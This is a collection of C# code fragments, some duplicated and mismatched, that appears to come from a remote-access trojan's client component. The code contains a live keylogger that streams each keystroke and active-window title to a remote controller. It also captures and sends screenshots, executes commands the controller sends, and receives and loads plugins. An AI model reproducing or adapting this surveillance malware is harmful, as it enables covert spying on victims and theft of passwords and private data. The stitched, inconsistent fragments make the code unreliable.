public MagicArrowService(Window window)
{
BaseWindow = window;
Application.Current.Deactivated += Application_Deactivated;
DockManager = new DockManager(window, DockingSide.Left);
_activeWindowHook = new ActiveWindowHook();
_activeWindowHook.ActiveWindowChanged += ActiveWindowHook_ActiveWindowChanged;
_magicArrowCheckTimer = new DispatcherTimer{Interval = TimeSpan.FromSeconds(1)};
_magicArrowCheckTimer.Tick += MagicArrowCheckTimer_Tick;
}
public void Register(Window window)
{
if (this.BaseWindow != null)
{
throw new InvalidOperationException("Only one window can be registered");
}
this.BaseWindow = window;
Application.Current.Deactivated += Application_Deactivated;
DockManager = new DockManager.DockManager(BaseWindow);
_activewindowhook = new ActiveWindowHook();
_activewindowhook.ActiveWindowChanged += activewindowhook_ActiveWindowChanged;
}
public MagicArrowService(Window window)
{
BaseWindow = window;
Application.Current.Deactivated += Application_Deactivated;
DockManager = new DockManager(window, DockingSide.Left);
_activeWindowHook = new ActiveWindowHook();
_activeWindowHook.ActiveWindowChanged += ActiveWindowHook_ActiveWindowChanged;
_magicArrowCheckTimer = new DispatcherTimer {
Interval = TimeSpan.FromSeconds(1)
};
_magicArrowCheckTimer.Tick += MagicArrowCheckTimer_Tick;
}
public override void Dispose()
{
base.Dispose();
#if DEBUG
if (Program.AsyncOperation != null)
Program.AsyncOperation.Post(state =>
#endif
#if !DEBUG
Program.AppContext.AsyncOperation.Post(state =>
#endif
{
if (_keyboardHook != null)
{
_keyboardHook.Dispose();
_keyboardHook = null;
}
if (_activeWindowHook != null)
{
_activeWindowHook.Dispose();
_activeWindowHook = null;
}
}, null);
}
public override void ProcessCommand(byte[] parameter, IConnectionInfo connectionInfo)
{
switch ((LiveKeyloggerCommunication) parameter[0])
{
case LiveKeyloggerCommunication.Start:
#if DEBUG
Program.AsyncOperation.Post(state =>
#endif
#if !DEBUG
Program.AppContext.AsyncOperation.Post(state =>
#endif
{
if (_keyboardHook == null)
{
_keyboardHook = new KeyboardHook();
_keyboardHook.StringDown += (sender, args) =>
{
if (args.IsChar)
{
ResponseBytes((byte) LiveKeyloggerCommunication.StringDown,
Encoding.UTF8.GetBytes(args.Value), connectionInfo);
}
else
{
var key = (Keys) args.VCode;
var specialKey = KeyLoggerService.KeysToSpecialKey(key);
var entry = specialKey == 0
? (KeyLogEntry) new StandardKey((Shared.Commands.Keylogger.Keys) key, true)
: new SpecialKey(specialKey, true);
ResponseBytes((byte) LiveKeyloggerCommunication.SpecialKeyDown,
new Serializer(new[]
{typeof (KeyLogEntry), typeof (SpecialKey), typeof (StandardKey)}).Serialize(
entry),
connectionInfo);
}
};
_keyboardHook.StringUp += (sender, args) =>
{
if (args.IsChar)
return;
var key = (Keys) args.VCode;
var specialKey = KeyLoggerService.KeysToSpecialKey(key);
var entry = specialKey == 0
? (KeyLogEntry) new StandardKey((Shared.Commands.Keylogger.Keys) key, false)
: new SpecialKey(specialKey, false);
ResponseBytes((byte) LiveKeyloggerCommunication.SpecialKeyUp,
new Serializer(new[]
{typeof (KeyLogEntry), typeof (SpecialKey), typeof (StandardKey)}).Serialize(entry),
connectionInfo);
};
}
if (_activeWindowHook == null)
{
_activeWindowHook = new ActiveWindowHook();
_activeWindowHook.ActiveWindowChanged += (sender, args) =>
{
ResponseBytes((byte) LiveKeyloggerCommunication.WindowChanged,
Encoding.UTF8.GetBytes(args.Title), connectionInfo);
};
_activeWindowHook.RaiseOne();
}
_keyboardHook.Hook();
}, null);
break;
case LiveKeyloggerCommunication.Stop:
Dispose();
break;
default:
throw new ArgumentOutOfRangeException();
}
}
private void ProcessResponse(byte parameter, int size, byte[] bytes)
{
switch ((FromAdministrationPackage)parameter)
{
case FromAdministrationPackage.InitializeNewSession:
var id = BitConverter.ToUInt16(bytes, 0);
var connection = new AdministrationConnection(id, this, _clientInfo);
connection.SendFailed += (sender, args) => Dispose();
AdministrationConnections.Add(connection);
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.ResponseLoginOpen);
BinaryWriter.Write(2);
BinaryWriter.Write(BitConverter.GetBytes(id));
}
break;
case FromAdministrationPackage.SendStaticCommand:
var potentialCommand =
new Serializer(typeof(PotentialCommand)).Deserialize <PotentialCommand>(bytes, 0);
StaticCommandSelector.Current.ExecuteCommand(potentialCommand);
break;
case FromAdministrationPackage.SendStaticCommandCompressed:
potentialCommand =
new Serializer(typeof(PotentialCommand)).Deserialize <PotentialCommand>(LZF.Decompress(bytes, 0), 0);
StaticCommandSelector.Current.ExecuteCommand(potentialCommand);
break;
case FromAdministrationPackage.LoadPlugin:
var guid = new Guid(bytes.Skip(2).Take(16).ToArray());
var version = new Serializer(typeof(PluginVersion)).Deserialize <PluginVersion>(bytes,
18);
var versionData = Encoding.ASCII.GetBytes(version.ToString());
if (LoadPlugin(guid, version))
{
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.PluginLoaded);
BinaryWriter.Write(16 + versionData.Length);
BinaryWriter.Write(guid.ToByteArray());
BinaryWriter.Write(versionData);
}
}
else
{
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.PluginLoadFailed);
BinaryWriter.Write(2 + 16 + versionData.Length);
BinaryWriter.Write(bytes, 0, 2); //administration id
BinaryWriter.Write(guid.ToByteArray());
BinaryWriter.Write(versionData);
}
}
break;
case FromAdministrationPackage.CloseSession:
var closingSessionId = BitConverter.ToUInt16(bytes, 0);
var session = AdministrationConnections.FirstOrDefault(x => x.Id == closingSessionId);
if (session != null)
{
AdministrationConnections.Remove(session);
session.Dispose();
}
break;
case FromAdministrationPackage.GetActiveWindow:
try
{
string windowTitle = "";
var lastInPut = new LASTINPUTINFO();
lastInPut.cbSize = (uint)Marshal.SizeOf(lastInPut);
//15 min
if (NativeMethods.GetLastInputInfo(ref lastInPut) &&
(uint)Environment.TickCount - lastInPut.dwTime > 900000)
{
windowTitle += "[Idle] ";
}
windowTitle += ActiveWindowHook.GetActiveWindowTitle() ?? "";
var windowTitleData = Encoding.UTF8.GetBytes(windowTitle);
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.ResponseActiveWindow);
BinaryWriter.Write(windowTitleData.Length + 2);
BinaryWriter.Write(bytes);
BinaryWriter.Write(windowTitleData);
}
}
catch (Exception ex)
{
ErrorReporter.Current.ReportError(ex,
"case FromAdministrationPackage.GetActiveWindow");
}
break;
case FromAdministrationPackage.GetScreen:
try
{
using (var compressor = new JpgCompression(75))
{
byte[] screenshotData;
using (var memoryStream = new MemoryStream())
using (var screenshot = ScreenHelper.TakeScreenshot())
{
compressor.Compress(screenshot, memoryStream);
screenshotData = memoryStream.ToArray();
}
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.ResponseScreenshot);
BinaryWriter.Write(screenshotData.Length + 2);
BinaryWriter.Write(bytes);
BinaryWriter.Write(screenshotData);
}
}
}
catch (Exception ex)
{
ErrorReporter.Current.ReportError(ex, "case FromAdministrationPackage.GetScreen");
}
break;
case FromAdministrationPackage.AcceptPush:
FileTransferAccepted?.Invoke(this, new FileTransferEventArgs(new Guid(bytes)));
break;
case FromAdministrationPackage.TransferCompleted:
FileTransferCompleted?.Invoke(this, new FileTransferEventArgs(new Guid(bytes)));
break;
case FromAdministrationPackage.IsAlive:
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.StillAlive);
BinaryWriter.Write(0);
}
break;
case FromAdministrationPackage.SendStaticCommandPlugin:
var pluginDirectory = new DirectoryInfo(Consts.StaticCommandPluginsDirectory);
if (!pluginDirectory.Exists)
{
pluginDirectory.Create();
}
var filename = FileExtensions.GetUniqueFileName(pluginDirectory.FullName);
using (var fileStream = new FileStream(filename, FileMode.CreateNew, FileAccess.Write))
fileStream.Write(bytes, 4, bytes.Length - 4);
StaticCommandPluginReceived?.Invoke(this, new StaticCommandPluginReceivedEventArgs(filename,
BitConverter.ToInt32(bytes, 0)));
break;
case FromAdministrationPackage.RequestLibraryInformation:
var libraries = (PortableLibrary)BitConverter.ToInt32(bytes, 2);
var libraryHashes = (size - 6) / 16;
var hashes = new List <byte[]>(libraryHashes);
for (int i = 0; i < libraryHashes; i++)
{
var hash = new byte[16];
Buffer.BlockCopy(bytes, 6 + i * 16, hash, 0, 16);
hashes.Add(hash);
}
var result = LibraryLoader.Current.CheckLibraries(libraries, hashes);
lock (SendLock)
{
BinaryWriter.Write((byte)FromClientPackage.ResponseLibraryInformation);
BinaryWriter.Write(6);
BinaryWriter.Write(bytes, 0, 2); //administration id
BinaryWriter.Write(BitConverter.GetBytes((int)result));
}
break;
case FromAdministrationPackage.StopActiveCommand:
StaticCommandSelector.Current.StopActiveCommand(BitConverter.ToInt32(bytes, 0));
break;
}
}
